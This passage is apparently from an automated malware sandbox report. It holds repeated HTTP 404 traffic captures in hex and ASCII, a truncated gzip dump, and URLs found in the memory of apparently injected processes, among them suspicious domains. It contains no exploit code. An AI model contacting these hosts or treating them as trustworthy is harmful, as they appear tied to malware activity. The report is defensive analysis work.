73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 11:32:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 11:32:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 11:32:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 10 Mar 2025 11:32:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 10 Mar 2025 11:32:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 10 Mar 2025 11:32:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 10 Mar 2025 11:32:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 31 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000006C78000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.0000000004258000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: svchost.exe, 00000007.00000002.2868897234.0000023C078D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: ungziped_file.exe, 00000000.00000002.1078729366.0000000002BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.5lzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net
